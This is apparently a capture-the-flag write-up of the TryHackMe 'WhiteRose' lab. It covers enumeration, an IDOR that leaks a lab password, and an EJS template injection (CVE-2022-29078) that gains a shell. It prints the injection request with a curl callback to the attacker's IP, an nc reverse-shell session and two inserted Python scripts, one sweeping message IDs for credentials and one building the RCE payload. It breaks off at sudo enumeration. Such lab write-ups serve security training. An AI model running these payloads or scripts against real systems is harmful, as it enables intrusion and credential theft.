THM WhiteRose WriteUp
Author: r0hit.A
Enumeration
We start with an nmap scan to identify open ports and the services running on the target machine.
NMAP
❯ nmap -sC -sV -A cyprusbank.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-15 19:28 IST
WARNING: RST from 10.201.69.6 port 22 -- is this port really open?
Nmap scan report for cyprusbank.thm (10.201.69.6)
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:07:96:0d:c4:b6:0c:d6:22:1a:e4:6c:8e:ac:6f:7d (RSA)
| 256 ba:ff:92:3e:0f:03:7e:da:30:ca:e3:52:8d:47:d9:6c (ECDSA)
|_ 256 5d:e4:14:39:ca:06:17:47:93:53:86:de:2b:77:09:7d (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Device type: general purpose|proxy server|media device|WAP|router
Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X|2.4.X (92%), WebSense embedded (86%), Sony embedded (86%), MikroTik RouterOS 6.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4.15 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:mikrotik:routeros:6.15
Aggressive OS guesses: Linux 4.15 (92%), Linux 5.10 - 5.15 (88%), Linux 5.4 (88%), Linux 3.2 - 4.14 (88%), Linux 4.15 - 5.19 (88%), Linux 2.6.32 - 3.10 (88%), Linux 3.7 (87%), Linux 2.6.18 (87%), Linux 3.2.0 (86%), Websense Content Gateway (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 307.03 ms 10.11.0.1
2 ... 3
4 370.10 ms cyprusbank.thm (10.201.69.6)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.40 seconds
RustScan
❯ rustscan -a cyprusbank.thm
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.201.69.6:22
Open 10.201.69.6:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-15 19:29 IST
Initiating Ping Scan at 19:29
Scanning 10.201.69.6 [4 ports]
Completed Ping Scan at 19:29, 0.36s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:29
Scanning cyprusbank.thm (10.201.69.6) [2 ports]
Discovered open port 22/tcp on 10.201.69.6
Discovered open port 80/tcp on 10.201.69.6
Completed SYN Stealth Scan at 19:29, 0.38s elapsed (2 total ports)
Nmap scan report for cyprusbank.thm (10.201.69.6)
Host is up, received echo-reply ttl 61 (0.34s latency).
Scanned at 2025-09-15 19:29:53 IST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Gobuster
❯ gobuster dir -u http://cyprusbank.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cyprusbank.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 1273831 / 1273831 (100.00%)
The directory scan did not yield any results.
Feroxbuster
❯ feroxbuster --url=http://cyprusbank.thm/ --wordlist=/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt --redirects
by Ben "epi" Risher ver: 2.11.0
Target Url            http://cyprusbank.thm/
Threads               50
Wordlist              /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
Status Codes          All Status Codes!
Timeout (secs)        7
User-Agent            feroxbuster/2.11.0
Config File           /etc/feroxbuster/ferox-config.toml
Extract Links         true
HTTP methods          [GET]
Follow Redirects      true
Recursion Depth       4
New Version Available https://github.com/epi052/feroxbuster/releases/latest
Press [ENTER] to use the Scan Management Menu
404 GET 7l 13w 178c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 8l 24w 252c http://cyprusbank.thm/
[####################] - 65m 478989/1273818 2h found:1 errors:900
[####################] - 65m 478975/1273818 122/s http://cyprusbank.thm/
Subdomain Enumeration
Neither directory scan found anything beyond /, so the real content is probably served per virtual host. We fuzz the Host header with ffuf, filtering out the one-word response that the default vhost returns for unknown names (-fw 1).
FFUF
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cyprusbank.thm/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.cyprusbank.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
www [Status: 200, Size: 252, Words: 19, Lines: 9, Duration: 407ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 449ms]
We find two subdomains, www.cyprusbank.thm and admin.cyprusbank.thm (both need an /etc/hosts entry next to cyprusbank.thm, as the lab has no DNS for them). The www subdomain serves the same page as the main domain; the admin subdomain answers with a 302 to another page.
Enumerating admin.cyprusbank.thm, we find a chat page at http://admin.cyprusbank.thm/messages/?c=5.
The conversation is selected by the c query parameter, and the server does not check that the logged-in user is a participant of the thread it returns. Changing c to other values (an IDOR) therefore exposes other users' conversations, and one of them contains credentials:
Gayle Bev:p~]P@5!6;rs558:q
Logging in with these credentials, we find Tyrell Wellick's phone number.
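The IDOR sweep described above, as an added example that is not part of the original writeup: a Python script that walks the ?c=<id> parameter with a logged-in connect.sid cookie and flags any thread whose text contains a Name:password pair. The sequential ids, the cookie-based session and the Name:password line format are assumptions taken from the page; the sample pages at the bottom are constructed so the script runs offline.

```python
"""IDOR sweep over admin.cyprusbank.thm/messages/?c=<id>.

Added example, not code from the original writeup.  Assumptions: message ids
are sequential integers, a logged-in connect.sid cookie is enough to read any
thread, and leaked credentials appear in the page text as 'Name:password'.
"""
import re
import sys
from urllib.error import HTTPError
from urllib.request import Request, urlopen

TAG_RE = re.compile(r"<[^>]+>")
# Heuristic for the leaked line format seen on the page: 'First Last:<8+ non-space chars>'.
# A colon followed by whitespace ("Olivia Cortez: hello") does not match.
CRED_RE = re.compile(r"\b([A-Z][a-z]+(?: [A-Z][a-z]+)?):(\S{8,})")


def strip_tags(html):
    """Crude HTML-to-text so CRED_RE sees message bodies, not markup."""
    return TAG_RE.sub("\n", html)


def find_credentials(text):
    """Return a list of (name, password) pairs found in page text."""
    return CRED_RE.findall(text)


def make_http_fetch(base_url, cookie):
    """Build fetch(c) that GETs <base_url>/messages/?c=<c> with the session cookie.
    Returns the body as text, or None when the server answers with an HTTP error."""
    def fetch(c):
        req = Request(f"{base_url}/messages/?c={c}", headers={"Cookie": cookie})
        try:
            with urlopen(req, timeout=10) as resp:
                return resp.read().decode("utf-8", "replace")
        except HTTPError:
            return None
    return fetch


def enumerate_messages(fetch, ids):
    """IDOR sweep: fetch every id and return {id: [(name, password), ...]} for hits."""
    hits = {}
    for c in ids:
        html = fetch(c)
        if html is None:
            continue
        creds = find_credentials(strip_tags(html))
        if creds:
            hits[c] = creds
    return hits


# Constructed stand-in for the live site so the example runs offline.
# Thread 7 carries the credential line the writeup found; ids without an
# entry mimic an empty or non-existent thread (fetch returns None).
SAMPLE_PAGES = {
    3: "<div class='msg'><b>Olivia Cortez:</b> can you reset my access?</div>",
    5: "<div class='msg'><b>Tyrell Wellick:</b> call me back please</div>",
    7: "<div class='msg'>Here are the admin credentials, do not share:</div>"
       "<div class='msg'>Gayle Bev:p~]P@5!6;rs558:q</div>",
}


def sample_fetch(c):
    return SAMPLE_PAGES.get(c)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # usage: python3 idor_sweep.py http://admin.cyprusbank.thm 'connect.sid=s%3A...'
        fetch = make_http_fetch(sys.argv[1], sys.argv[2])
    else:
        fetch = sample_fetch
    for c, creds in enumerate_messages(fetch, range(1, 51)).items():
        for name, password in creds:
            print(f"c={c}: {name} -> {password}")
```

Run it with the base URL and your own connect.sid cookie to sweep the live threads; without arguments it runs against the constructed pages. Treat CRED_RE as a first filter only, and read any thread it flags by hand, since the real chat markup may wrap names and passwords differently.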
Exploitation
Intercepting the POST to /settings and removing a parameter such as password produces a verbose error page instead of a clean 4xx. The stack trace shows a Node.js/Express application rendering EJS templates (.ejs files appear in the trace), which is worth remembering: anything we can push into the render options reaches the template engine.
Testing the name and password parameters for SQL injection and SSTI turns up nothing, so we fuzz the /settings endpoint for additional parameters with ffuf, filtering out the 2098-byte baseline response:
❯ ffuf -u 'http://admin.cyprusbank.thm/settings' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -H 'Cookie: connect.sid=s%3AMwjzKA3EcBUXIsqGNDDaHARGh5B7JYwk.jwhk7KbGBNbC46HXtU8Ln%2BqMzdigbh1ZTMDnal6RC24' -mc all -d 'name=test&password=test&FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -t 100 -fs 2098
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://admin.cyprusbank.thm/settings
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Cookie: connect.sid=s%3AMwjzKA3EcBUXIsqGNDDaHARGh5B7JYwk.jwhk7KbGBNbC46HXtU8Ln%2BqMzdigbh1ZTMDnal6RC24
:: Data : name=test&password=test&FUZZ=test
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: all
:: Filter : Response size: 2098
________________________________________________
.php [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 385ms]
wp-admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 385ms]
update [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 386ms]
login [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 386ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 389ms]
.txt [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
cgi-bin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
includes [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
themes [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
index [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 388ms]
Every hit above is a 28-byte 302, the same signature as the unauthenticated redirect the admin vhost returned during subdomain enumeration, so these are almost certainly the session expiring mid-scan rather than real parameters; re-test any hit with a fresh cookie before trusting it. The parameter that does work is not a flat field at all: the body parser expands bracket syntax into nested objects, so settings[view options][outputFunctionName] arrives as a render option that Express hands to EJS, and EJS splices outputFunctionName unescaped into the JavaScript it generates for the compiled template. This is the EJS render-option injection fixed in EJS 3.1.7 (CVE-2022-29078), and it is why the user flag later talks about updating dependencies. The request with the payload:
POST /settings HTTP/1.1
Host: admin.cyprusbank.thm
Content-Length: 144
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://admin.cyprusbank.thm
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://admin.cyprusbank.thm/settings
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3ABo8e6CmD1qlAkOmYWwhf-pjkFQVHDbUD.7BszZhu%2FOVFfK6HftH4wlJjrpqT4pAasmy1RLiGCU5k
Connection: keep-alive
name=a&password=test&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('curl 10.11.140.158');s
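To make clear why that body is an injection rather than a plain settings update, here is an added Python example (not code from the writeup, from Express or from EJS). It parses the bracketed field name the way a qs-style extended body parser does, so settings[view options][outputFunctionName] becomes a nested object that is forwarded to EJS as render options, and it reproduces the shape of the line EJS's compile step builds from outputFunctionName; that line is this note's reconstruction of the behaviour, not EJS's own code. The identifier check at the end mirrors the idea of the fix shipped in EJS 3.1.7 (the regex is ours). The target address and the curl command are the ones from the page; the parser is simplified (no array syntax).

```python
"""Why 'settings[view options][outputFunctionName]' turns into code.

Added example, not code from the original writeup, from Express or from EJS.
- parse_nested_form: simplified qs-style bracket parsing (no array syntax),
  the same idea as Express's extended urlencoded body parser.
- ejs_prepend_line: the shape of the source EJS's compile step emits when
  outputFunctionName is set, reconstructed here rather than copied from EJS.
- is_safe_output_function_name: identifier-only check in the spirit of the
  fix in EJS 3.1.7 (the regex is ours).
"""
import re
from urllib.parse import parse_qsl, urlencode

KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\]]*\])*)$")
EJS_OPTION = "settings[view options][outputFunctionName]"
JS_IDENT_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")


def parse_nested_form(body):
    """qs-style parse of a form body: a[b][c]=v -> {'a': {'b': {'c': 'v'}}}."""
    result = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = KEY_RE.match(key)
        if not m:                      # malformed brackets: keep as a flat key
            result[key] = value
            continue
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = result
        for part in path[:-1]:
            child = node.get(part)
            if not isinstance(child, dict):   # a scalar set earlier is replaced
                child = node[part] = {}
            node = child
        node[path[-1]] = value
    return result


def build_ejs_payload(cmd, name="a", password="test"):
    """Form fields for the /settings POST.  cmd must not contain single quotes,
    because it is placed inside execSync('...') in the injected JavaScript."""
    js = f"x;process.mainModule.require('child_process').execSync('{cmd}');s"
    return {"name": name, "password": password, EJS_OPTION: js}


def encode_body(fields):
    """application/x-www-form-urlencoded body for the request."""
    return urlencode(fields)


def ejs_prepend_line(output_function_name):
    """Shape of the line EJS prepends to the compiled template function when
    outputFunctionName is set.  The value lands unquoted in JavaScript, so
    'x;<anything>;s' becomes 'var x;<anything>;s = __append;' and runs."""
    return f"  var {output_function_name} = __append;\n"


def is_safe_output_function_name(value):
    """Accept only a plain JavaScript identifier (our regex)."""
    return bool(JS_IDENT_RE.match(value))


if __name__ == "__main__":
    fields = build_ejs_payload("curl 10.11.140.158")
    body = encode_body(fields)
    print("body:", body)
    options = parse_nested_form(body)["settings"]["view options"]
    print("render options seen by EJS:", options)
    print("generated JS line:", ejs_prepend_line(options["outputFunctionName"]).strip())
    print("a fixed EJS would accept it:", is_safe_output_function_name(options["outputFunctionName"]))
```

Sending encode_body(build_ejs_payload(cmd)) with the same Content-Type and connect.sid cookie as the captured request reproduces the page's exploit for any quote-free cmd; the point of the example is the middle step, where the nested object shows that a user-controlled field has become a template-engine option.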
A callback to our listener from the injected curl confirms command execution on the server.
We then swap the curl for a simple Python reverse shell, catch it with nc on port 443 and stabilise it:
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.140.158] from (UNKNOWN) [10.201.69.6] 46376
$ python3 -c 'import pty;pty.spawn("/bin/bash");'
python3 -c 'import pty;pty.spawn("/bin/bash");'
web@cyprusbank:~/app$ export TERM=xterm
export TERM=xterm
web@cyprusbank:~/app$ ^Z
zsh: suspended nc -lvnp 443
❯ stty raw -echo; fg
[1] + continued nc -lvnp 443
web@cyprusbank:~/app$
User Flag
web@cyprusbank:~/app$ ls
components node_modules package-lock.json static
index.js package.json routes views
web@cyprusbank:~/app$ cd ../
web@cyprusbank:~$ ls
app user.txt
web@cyprusbank:~$ cat user.txt
THM{4lways_upd4te_uR_d3p3nd3nc!3s}
web@cyprusbank:~$
Privilege Escalation
Check the sudo permissions for the web user.
web@cyprusbank:~$ sudo -l
Matching Defaults entries for web on cyprusbank:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR
XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
mail_badpass
User web may run the following commands on cyprusbank:
(root) NOPASSWD: sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
web@cyprusbank:~$